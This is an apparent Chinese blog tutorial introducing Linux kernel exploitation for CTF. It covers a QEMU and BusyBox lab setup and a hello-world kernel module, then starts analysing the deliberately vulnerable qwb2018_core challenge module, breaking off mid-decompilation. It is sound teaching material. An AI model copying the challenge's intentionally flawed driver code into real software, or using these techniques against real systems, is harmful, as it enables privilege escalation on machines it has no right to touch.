<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Kernel Pwn 入门 - Humoooor&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Humoooor&#039;s Blog"><meta name="msapplication-TileImage" content="/img/MyLogo.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Humoooor&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="本机环境为 Ubuntu 22.04 x86_64 首先感谢 a3gg 让我们避免入门 Kernel Pwn 路上的很多坑"><meta property="og:type" content="blog"><meta property="og:title" content="Kernel Pwn 入门"><meta property="og:url" content="https://humoooor.cn/2023/08/20/Kernel%20Pwn%20%E5%85%A5%E9%97%A8/"><meta property="og:site_name" content="Humoooor&#039;s Blog"><meta property="og:description" content="本机环境为 Ubuntu 22.04 x86_64 首先感谢 a3gg 让我们避免入门 Kernel Pwn 路上的很多坑"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://humoooor.cn/img/og_image.png"><meta property="article:published_time" content="2023-08-20T00:53:00.000Z"><meta property="article:modified_time" content="2023-10-04T11:52:38.050Z"><meta property="article:author" content="Humoooor"><meta property="article:tag" content="Linux Kernel"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://humoooor.cn/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://humoooor.cn/2023/08/20/Kernel%20Pwn%20%E5%85%A5%E9%97%A8/"},"headline":"Kernel Pwn 入门","image":["https://humoooor.cn/img/og_image.png"],"datePublished":"2023-08-20T00:53:00.000Z","dateModified":"2023-10-04T11:52:38.050Z","author":{"@type":"Person","name":"Humoooor"},"publisher":{"@type":"Organization","name":"Humoooor's Blog","logo":{"@type":"ImageObject","url":"https://humoooor.cn/img/MyLogo.jpg"}},"description":"本机环境为 Ubuntu 22.04 x86_64 首先感谢 a3gg 让我们避免入门 Kernel Pwn 路上的很多坑"}</script><link rel="canonical" href="https://humoooor.cn/2023/08/20/Kernel%20Pwn%20%E5%85%A5%E9%97%A8/"><link rel="icon" href="/img/MyLogo.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Humoooor's Blog" type="application/atom+xml">
</head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/MyLogo.jpg" alt="Humoooor&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/friends">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/humoooor"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2023-08-20T00:53:00.000Z" title="2023/8/20 08:53:00">2023-08-20</time>发表</span><span class="level-item"><time dateTime="2023-10-04T11:52:38.050Z" title="2023/10/4 19:52:38">2023-10-04</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/Pwn/">Pwn</a></span><span class="level-item">19 分钟读完 (大约2921个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">Kernel Pwn 入门</h1><div class="content"><p>本机环境为 Ubuntu 22.04 x86_64</p>
<p>首先感谢 a3gg 让我们避免入门 Kernel Pwn 路上的很多坑</p>
<span id="more"></span>

<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><h3 id="安装一些依赖包"><a href="#安装一些依赖包" class="headerlink" title="安装一些依赖包"></a>安装一些依赖包</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt git fakeroot build-essential ncurses-dev xz-utils qemu-system-x86 flex libncurses5-dev libssl-dev bc bison libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev libelf-dev</span><br></pre></td></tr></table></figure>

<h3 id="获取内核镜像"><a href="#获取内核镜像" class="headerlink" title="获取内核镜像"></a>获取内核镜像</h3><p>内核镜像一般称为 bzImage</p>
<p>这里准备下载已编译内核镜像</p>
<ol>
<li>列出版本对应可下载内核镜像</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt search linux-image | grep 5.19.0</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>选一个看着顺眼的下载就行</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt download linux-image-5.19.0-generic-41-generic</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>解压下载的 deb 文件</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dpkg -X ./ linux-image-5.19.0-41-generic_5.19.0-41.42~22.04.1_amd64.deb</span><br></pre></td></tr></table></figure>

<p><code>./boot/vmlinuz-5.19.0-41-generic</code> 就是 bzImage 镜像文件</p>
<h3 id="使用-Busybox-构建文件系统"><a href="#使用-Busybox-构建文件系统" class="headerlink" title="使用 Busybox 构建文件系统"></a>使用 Busybox 构建文件系统</h3><h4 id="编译-Busybox"><a href="#编译-Busybox" class="headerlink" title="编译 Busybox"></a>编译 Busybox</h4><p>BusyBox 是一个集成了三百多个最常用 Linux 命令和工具的软件，包含了例如 ls、cat 和 echo 等一些简单的工具，Busybox 可以为内核提供一个基本的用户环境</p>
<ol>
<li>获取 Busybox 源码</li>
</ol>
<p>选择一个稳定版本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>编译</li>
</ol>
<p>进入配置页面</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make menuconfig</span><br></pre></td></tr></table></figure>

<p>勾选 <code>Settings</code> –&gt; <code>Build static binary file (no shared file)</code>，这样不用单独配置 libc，然后退出</p>
<p>接下来编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make install</span><br></pre></td></tr></table></figure>

<p>生成一个 <code>_install</code> 目录，用来构建磁盘镜像</p>
<h4 id="构建文件系统"><a href="#构建文件系统" class="headerlink" title="构建文件系统"></a>构建文件系统</h4><ol>
<li>初始化文件系统</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> _install</span><br><span class="line"><span class="built_in">mkdir</span> -pv &#123;bin,sbin,etc,proc,sys,home,lib64,lib/x86_64-linux-gnu,usr/&#123;bin,sbin&#125;&#125;</span><br><span class="line"><span class="built_in">touch</span> ./etc/inittab</span><br><span class="line"><span class="built_in">mkdir</span> ./etc/init.d</span><br><span class="line"><span class="built_in">touch</span> ./etc/init.d/rcS</span><br><span class="line"><span class="built_in">chmod</span> +x ./etc/init.d/rcS</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>配置初始化脚本</li>
</ol>
<p>配置 <code>./etc/inttab</code>，写入下面内容，指定系统初始化脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">::sysinit:/etc/init.d/rcS  </span><br><span class="line">::askfirst:/bin/ash  </span><br><span class="line">::ctrlaltdel:/sbin/reboot  </span><br><span class="line">::shutdown:/sbin/swapoff -a  </span><br><span class="line">::shutdown:/bin/umount -a -r  </span><br><span class="line">::restart:/sbin/init</span><br></pre></td></tr></table></figure>

<p>配置 <code>./etc/init.d/rcS</code>，挂载各种文件系统</p>
<figure class="highlight bash"><figcaption><span>./etc/init.d/rcS</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs devtmpfs /dev</span><br><span class="line">mount -t tmpfs tmpfs /tmp</span><br><span class="line"><span class="built_in">mkdir</span> /dev/pts</span><br><span class="line">mount -t devpts devpts /dev/pts</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">&quot;\nBoot took <span class="subst">$(cut -d&#x27; &#x27; -f1 /proc/uptime)</span> seconds\n&quot;</span></span><br><span class="line">setsid cttyhack setuidgid 1000 sh</span><br><span class="line"></span><br><span class="line">poweroff -d 0 -f</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>配置用户组</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;root:x:0:0:root:/root:/bin/sh&quot;</span> &gt; etc/passwd</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;ctf:x:1000:1000:ctf:/home/ctf:/bin/sh&quot;</span> &gt;&gt; etc/passwd</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;root:x:0:&quot;</span> &gt; etc/group</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;ctf:x:1000:&quot;</span> &gt;&gt; etc/group</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;none /dev/pts devpts gid=5,mode=620 0 0&quot;</span> &gt; etc/fstab</span><br></pre></td></tr></table></figure>

<h4 id="打包文件系统为镜像文件"><a href="#打包文件系统为镜像文件" class="headerlink" title="打包文件系统为镜像文件"></a>打包文件系统为镜像文件</h4><p>在 <code>_install</code> 目录下执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find . | cpio -o -H newc &gt; ../../rootfs.cpio</span><br></pre></td></tr></table></figure>

<h4 id="在文件系统中添加或修改文件"><a href="#在文件系统中添加或修改文件" class="headerlink" title="在文件系统中添加或修改文件"></a>在文件系统中添加或修改文件</h4><p>可以直接向 <code>_install</code> 内添加修改，但会比较混乱，也可以解压文件系统镜像后再打包</p>
<ol>
<li>解压文件系统镜像</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cpio -idv &lt; ./rootfs.cpio</span><br></pre></td></tr></table></figure>

<p>向里面加入想要添加的文件即可</p>
<ol start="2">
<li>重打包文件系统镜像</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find . | cpio -o -H newc &gt; ../new_rootfs.cpio</span><br></pre></td></tr></table></figure>

<h3 id="使用-qemu-运行内核"><a href="#使用-qemu-运行内核" class="headerlink" title="使用 qemu 运行内核"></a>使用 qemu 运行内核</h3><p>将 bzImage 和 rootfs.cpio 放到同一个目录</p>
<p>编写启动脚本 boot.sh</p>
<figure class="highlight bash"><figcaption><span>boot.sh</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 128M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd ./rootfs.cpio \</span><br><span class="line">-monitor /dev/null \</span><br><span class="line">-append <span class="string">&quot;root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet nokaslr&quot;</span> \</span><br><span class="line">-cpu kvm64,+smep \</span><br><span class="line">-smp cores=2,threads=1 \</span><br><span class="line">-nographic \</span><br><span class="line">-s</span><br></pre></td></tr></table></figure>

<p>部分参数说明如下：</p>
<ul>
<li><code>-m</code>：虚拟机内存大小</li>
<li><code>-kernel</code>：内存镜像路径</li>
<li><code>-initrd</code>：磁盘镜像路径</li>
<li><code>-append</code>：附加参数选项<ul>
<li><code>nokalsr</code>：关闭内核地址随机化，方便调试</li>
<li><code>rdinit</code>：指定初始启动进程，<code>/sbin/init</code> 进程会默认以 <code>/etc/init.d/rcS</code> 作为启动脚本</li>
<li><code>loglevel=3</code> &amp; <code>quiet</code>：不输出 log</li>
<li><code>console=ttyS0</code>：指定终端为 <code>/dev/ttyS0</code>，这样一启动就能进入终端界面</li>
</ul>
</li>
<li><code>-monitor</code>：将监视器重定向到主机设备 <code>/dev/null</code>，这里重定向至 null 主要是防止 CTF 中被人给偷了 qemu 拿 flag</li>
<li><code>-cpu</code>：设置 CPU 安全选项，在这里开启了 SMEP 保护</li>
<li><code>-s</code>：相当于 <code>-gdb tcp::1234</code> 的简写（也可以直接这么写），后续可以通过 gdb 连接本地端口进行调试</li>
</ul>
<p>接下来运行 boot.sh 即可成功运行</p>
<h2 id="了解-LKM"><a href="#了解-LKM" class="headerlink" title="了解 LKM"></a>了解 LKM</h2><p>虽然 Linux 内核采用宏内核架构，但是内核装载的很多服务其实很少用到甚至用不到，但它们会占据大量内存空间，且添加、修改、删除服务往往要重新编译整个内核，浪费时间</p>
<p>可装载内核模块（Loadable Kernel Module）因此出现，在内核中它可以自由地装载或卸载，而不用重新编译、重启内核，提高了内核的可拓展性和维护性。而设备驱动就是其中一种</p>
<p>CTF 中的 kenrel pwn 往往就是通过 LKM 的漏洞来控制内核，而不是 pwn 内核组件</p>
<h3 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h3><p>LKM 同样也是 ELF 格式文件，但不能独立运行，必须装载在内核中运行，并且上下文为内核空间</p>
<p>因此 LKM 不能使用共享库中的函数，也不能直接与用户进行交互，它必须使用内核提供的函数，在某种意义上来说 LKM 编程也是内核编程</p>
<h3 id="编写一个简单模块"><a href="#编写一个简单模块" class="headerlink" title="编写一个简单模块"></a>编写一个简单模块</h3><figure class="highlight c"><figcaption><span>hello_kernel.c</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">* hello_kernel.c</span></span><br><span class="line"><span class="comment">* developed by Humoooor</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/kernel.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">int</span> __init <span class="title function_">kernel_module_init</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    printk(<span class="string">&quot;&lt;1&gt; Hello the Linux kernel world!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line"><span class="type">static</span> <span class="type">void</span> __exit <span class="title function_">kernel_module_exit</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123; </span><br><span class="line">    printk(<span class="string">&quot;&lt;1&gt; Good bye the Linux kernel world! See you again!\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">module_init(kernel_module_init);</span><br><span class="line">module_exit(kernel_module_exit);</span><br><span class="line">MODULE_LICENSE(<span class="string">&quot;GPL&quot;</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">&quot;Humoooor&quot;</span>);</span><br></pre></td></tr></table></figure>

<ul>
<li>头文件<ul>
<li><code>linux/module.h</code>：LKM 必须包含</li>
<li><code>linux/kernel.h</code>：载入内核相关信息</li>
<li><code>linux/init.h</code>：包含一些常用的宏</li>
<li>一般这三个头文件在 LKM 编程中都要使用</li>
</ul>
</li>
<li>LKM 入口点/出口点<ul>
<li><code>module_init</code>：内核载入 LKM 时会缺省调用</li>
<li><code>module_exit</code>：内核卸载 LKM 时会缺省调用</li>
</ul>
</li>
<li>其他<ul>
<li><code>__init</code> 和 <code>__exit</code>：在函数结束后释放对应内存</li>
<li><code>MODULE_LICENSE</code> 和 <code>MODULE_AUTHOR</code>：声明 LKM 作者和许可证</li>
<li><code>printk</code>：内核函数，向内核缓冲区写入，<code>&lt;1&gt;</code> 表示信息的紧急级别（8 个优先级，0 为最高）</li>
</ul>
</li>
</ul>
<h3 id="编译-LKM"><a href="#编译-LKM" class="headerlink" title="编译 LKM"></a>编译 LKM</h3><p>一般使用 Makefile 来编译 LKM</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">obj-m += hello_kernel.o</span><br><span class="line">CURRENT_PATH := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line">LINUX_KERNEL := <span class="variable">$(<span class="built_in">shell</span> uname -r)</span></span><br><span class="line">LINUX_KERNEL_PATH := /usr/src/linux-headers-<span class="variable">$(LINUX_KERNEL)</span></span><br><span class="line"><span class="section">all:</span></span><br><span class="line">    make -C <span class="variable">$(LINUX_KERNEL_PATH)</span> M=<span class="variable">$(CURRENT_PATH)</span> modules</span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">    make -C <span class="variable">$(LINUX_KERNEL_PATH)</span> M=<span class="variable">$(CURRENT_PATH)</span> clean</span><br></pre></td></tr></table></figure>

<ul>
<li><code>obj-m</code>：指定了编译的结果应当为 <code>.ko</code> 文件，即可装载内核模块，类似命令有：<code>obj-y</code> 编译进内核，<code>obj-n</code> 不编译</li>
<li><code>CURRENT_PATH &amp; LINUX_KERNEL &amp; LINUX_KERNEL_PATH</code>：三个自定义变量，分别意味着通过 shell 命令获得当前路径、内核版本、内核源码路径</li>
<li><code>all</code>：编译指令</li>
<li><code>clean</code>：清理指令</li>
</ul>
<p>使用 <code>make</code> 命令即可编译生成 hello_kernel.ko 文件</p>
<h3 id="使用-LKM"><a href="#使用-LKM" class="headerlink" title="使用 LKM"></a>使用 LKM</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 装载 LKM</span></span><br><span class="line">sudo insmod hello_kernel.ko</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看 LKM</span></span><br><span class="line">lkmod | grep hello_kernel</span><br><span class="line"></span><br><span class="line"><span class="comment"># 卸载 LKM</span></span><br><span class="line">sudo rmmod hello_kernel.ko</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看 LKM 输出信息</span></span><br><span class="line">dmesg | grep <span class="string">&quot;kenrel module&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="入门题-qwb2018-core"><a href="#入门题-qwb2018-core" class="headerlink" title="入门题 qwb2018_core"></a>入门题 qwb2018_core</h2><h3 id="查看脚本"><a href="#查看脚本" class="headerlink" title="查看脚本"></a>查看脚本</h3><p>看一下启动脚本 start.sh</p>
<figure class="highlight bash"><figcaption><span>start.sh</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \  </span><br><span class="line">-m 64M \  </span><br><span class="line">-kernel ./bzImage \  </span><br><span class="line">-initrd  ./core.cpio \  </span><br><span class="line">-append <span class="string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr&quot;</span> \  </span><br><span class="line">-s  \  </span><br><span class="line">-netdev user,<span class="built_in">id</span>=t0, -device e1000,netdev=t0,<span class="built_in">id</span>=nic0 \  </span><br><span class="line">-nographic  \</span><br></pre></td></tr></table></figure>

<p>开启 kaslr，可以先关闭 kaslr 获取没有偏移的函数地址</p>
<p>再看一下 init 脚本</p>
<figure class="highlight bash"><figcaption><span>init</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh  </span></span><br><span class="line">mount -t proc proc /proc  </span><br><span class="line">mount -t sysfs sysfs /sys  </span><br><span class="line">mount -t devtmpfs none /dev  </span><br><span class="line">/sbin/mdev -s  </span><br><span class="line"><span class="built_in">mkdir</span> -p /dev/pts  </span><br><span class="line">mount -vt devpts -o gid=4,mode=620 none /dev/pts  </span><br><span class="line"><span class="built_in">chmod</span> 666 /dev/ptmx  </span><br><span class="line"><span class="built_in">cat</span> /proc/kallsyms &gt; /tmp/kallsyms  </span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/kptr_restrict</span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/dmesg_restrict  </span><br><span class="line">ifconfig eth0 up  </span><br><span class="line">udhcpc -i eth0  </span><br><span class="line">ifconfig eth0 10.0.2.15 netmask 255.255.255.0  </span><br><span class="line">route add default gw 10.0.2.2    </span><br><span class="line">insmod /core.ko  </span><br><span class="line">   </span><br><span class="line">poweroff -d 120 -f &amp;  </span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh  </span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;sh end!\n&#x27;</span>  </span><br><span class="line">umount /proc  </span><br><span class="line">umount /sys  </span><br><span class="line">   </span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure>

<p><del>看不太懂，先把 poweroff 注释掉再打包回去再说</del></p>
<p>这里把 kallsyms 复制过去了，可以得到内核各个符号的地址</p>
<p>注意这里的解包和打包不太一样，发现还有一层 gzip 的压缩，卡了好久 wsfw</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">find . | cpio -o -H newc | gzip -9 &gt; ../core.cpio</span><br><span class="line"></span><br><span class="line"><span class="comment"># 后来发现自带了打包脚本 gen_cpio.sh</span></span><br><span class="line">find . -print0 \</span><br><span class="line">| cpio --null -ov --format=newc \</span><br><span class="line">| gzip -9 &gt; <span class="variable">$1</span></span><br></pre></td></tr></table></figure>

<h3 id="分析-LKM"><a href="#分析-LKM" class="headerlink" title="分析 LKM"></a>分析 LKM</h3><p>浅浅 checksec 一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ checksec core.ko</span><br><span class="line">   Arch:     amd64-64-little</span><br><span class="line">   RELRO:    No RELRO</span><br><span class="line">   Stack:    Canary found</span><br><span class="line">   NX:       NX enabled</span><br><span class="line">   PIE:      No PIE (0x0)</span><br></pre></td></tr></table></figure>

<p>然后直接拖入 IDA 即可</p>
<p>先看看 <code>init_module</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">init_module</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  core_proc = proc_create(<span class="string">&quot;core&quot;</span>, <span class="number">0666LL</span>, <span class="number">0LL</span>, &amp;core_fops);</span><br><span class="line">  printk(&amp;unk_2DE);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>创建一个进程节点文件 <code>/proc/core</code>，用于用户进程与 LKM 通信</p>
<p>查看 core_fops 结构体，定义了三个函数</p>
<ul>
<li><code>core_write</code>：调用 <code>write</code> 时，内核调用此函数</li>
<li><code>core_ioctl</code>：调用 <code>ioctl</code> 时，内核调用此函数</li>
<li><code>core_release</code>：只有打印功能，还是看看 <code>core_write</code> 和 <code>core_ioctl</code> 家人们</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">core_write</span><span class="params">(__int64 fd, __int64 user, <span class="type">unsigned</span> __int64 size)</span></span><br><span class="line">&#123;</span><br><span class="line">  printk(&amp;unk_215);</span><br><span class="line">  <span class="keyword">if</span> ( size &lt;= <span class="number">0x800</span> &amp;&amp; !copy_from_user(&amp;name, user, size) )</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">unsigned</span> <span class="type">int</span>)size;</span><br><span class="line">  printk(&amp;unk_230);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0xFFFFFFF2</span>LL;</span><br><span 